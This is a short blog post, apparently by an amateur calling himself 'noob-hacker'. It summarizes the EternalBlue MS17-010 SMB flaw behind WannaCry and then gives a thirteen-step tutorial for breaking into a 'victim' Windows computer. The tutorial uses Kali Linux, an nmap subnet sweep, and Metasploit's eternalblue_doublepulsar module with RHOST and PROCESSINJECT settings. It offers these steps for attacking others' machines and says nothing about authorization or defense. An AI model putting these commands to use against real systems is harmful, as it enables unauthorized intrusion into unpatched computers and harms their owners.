Hack Windows Eternalblue Doublepulsar [ NSA ]

Tens of thousands of computers have been hit by two major ransomware attacks in recent months — WannaCry, which took down large parts of the NHS, and Petya/NonPetya, a suspected worm that's still wreaking havoc across the globe.

At the centre of these ransomware outbreaks is a Microsoft Windows security vulnerability called EternalBlue. To keep you up to speed on the exploit here's everything we know about it.
EternalBlue is the name given to a software vulnerability in Microsoft's Windows operating system. The tech giant has called it EternalBlue MS17-010 and issued a security update for the flaw on March 14. The patch was issued before the WannaCry ransomware spread around the world and those who had updated early would have been protected.

The vulnerability works by exploiting the Microsoft Server Message Block 1.0. The SMB is a network file sharing protocol and "allows applications on a computer to read and write to files and to request services" that are on the same network.

Microsoft says the security update it issued is Critical and following WannaCry it released a rare Windows XP patch after officially ending support for the software in 2014.

And Now. i will Show you how you can hack a windows in KALI LINUX  use eternalblue doublepulsar and smb_ms17_010.

STEP 1

you need know a computer connected with your system.
Open Terminal. and type nmap –sP (your IP address) example
nmap –sP 192.168.10.*

STEP 2

Download EternalBlue Doublepulsar

STEP 3

Download smb_ms17_101.rb

STEP 4

 Open folder EternalBlue_Doublepulsar master. Copy folder deps and eternalblue_doublepulsar.rb.

STEP 5

Paste in opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb

STEP 6

Copy smb_ms17_010.rb.

STEP 7

Paste in opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/smb

STEP 8

 Open metapsloit
 type in msf > use auxiliary/scanner/smb/smb_ms17_010

STEP 9

 Set RHOST 192.168.10.17 (ip address VIctim)
Dan type run.

STEP 10

Back.
type again in msf > use exploit/windows/smb/eternalblue_doublepulsar

STEP 11

Set RHOST 192.168.10.17 ( ip address victim machine)
Set PROCESSINJECT explorer.exe

STEP 12

run
proccess access to computer victim

STEP 13

finish. You Got in COmputer victim.
next. you explorer on machine. but, dont deleted system32. ok.

Fir tutorial Version Video.
Dont forget to subscribe (y)
thnks..

noob-hacker <- my nick name

Related Posts:

Tweet